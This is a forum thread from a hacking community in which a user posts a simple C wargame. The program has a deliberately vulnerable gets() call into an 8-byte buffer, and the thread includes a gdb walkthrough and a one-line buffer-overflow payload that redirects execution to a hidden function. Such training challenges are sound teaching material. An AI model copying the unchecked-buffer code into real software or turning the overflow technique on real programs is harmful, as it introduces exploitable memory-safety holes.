iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Wargame - Simple
  • chroniccommand
    Posts: 1,389
    So here is a simple wargame I've whipped up in C. The idea is the user has to call a function that isnt called in the program. The way this is accomplished is with a buffer overflow. Here is the source of the wargame:


    #include <stdlib.h>
    #include <stdio.h>

    NoCall()
    {
        printf(\"Password: 93x#L\n\");
        exit(0);
    }

    EvilInput()
    {
      char evilbuffer[8];
      printf(\"Insert text: \");
      gets(evilbuffer);
      puts(evilbuffer);
    }

    main()
    {
      EvilInput();
      return 0;
    }


    So the idea is we just give the compiled binary but not the source. We give the user a hint that the function they must call is NoCall()

    So here is a sample solution:

    [chronic@vandal tmp]$ ./wargame
    Insert text: AAAAAAAAAAAAA
    AAAAAAAAAAAAA
    Segmentation fault
    [chronic@vandal tmp]$ gdb wargame
    GNU gdb (GDB) 7.2
    Copyright (C) 2010 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"
    and \"show warranty\" for details.
    This GDB was configured as \"i686-pc-linux-gnu\".
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>...
    Reading symbols from /tmp/wargame...(no debugging symbols found)...done.
    (gdb) list
    No symbol table is loaded.  Use the \"file\" command.
    (gdb) disas NoCall
    Dump of assembler code for function NoCall:
       0x08048434 <+0>:     push   %ebp
       0x08048435 <+1>:     mov    %esp,%ebp
       0x08048437 <+3>:     sub    $0x4,%esp
       0x0804843a <+6>:     mov    $0x8048550,%eax
       0x0804843f <+11>:    mov    %eax,(%esp)                                                    
       0x08048442 <+14>:    call   0x8048350 <printf@plt>                                         
       0x08048447 <+19>:    movl   $0x0,(%esp)                                                    
       0x0804844e <+26>:    call   0x8048370 <exit@plt>                                           
    End of assembler dump.                                                                        
    (gdb) q                                                                                       
    [chronic@vandal tmp]$ printf \"AAAAAAAAAAAA\x34\x84\x04\x08\" | ./wargame
    Insert text: AAAAAAAAAAAA4�
    Password: 93x#L
    [chronic@vandal tmp]$


    Now printing the password to stdout isnt exactly the best solution. So I was thinking we could maybe use execve to execute a program like /bin/iexploit that displays the password.
  • Sh3llc0d3
    Posts: 1,910
    I like the idea... bit more complex compared to other challenges :)
  • Xin
    Posts: 3,251
    Nice Wargame, we have a nice little set now :)
    Xin
  • chroniccommand
    Posts: 1,389
    said:


    Nice Wargame, we have a nice little set now :)



    Thanks I'll probably work on a couple more pretty soon.
  • XinR
    Posts: 4
    Where can i find what a "wargame" means?
Add a Comment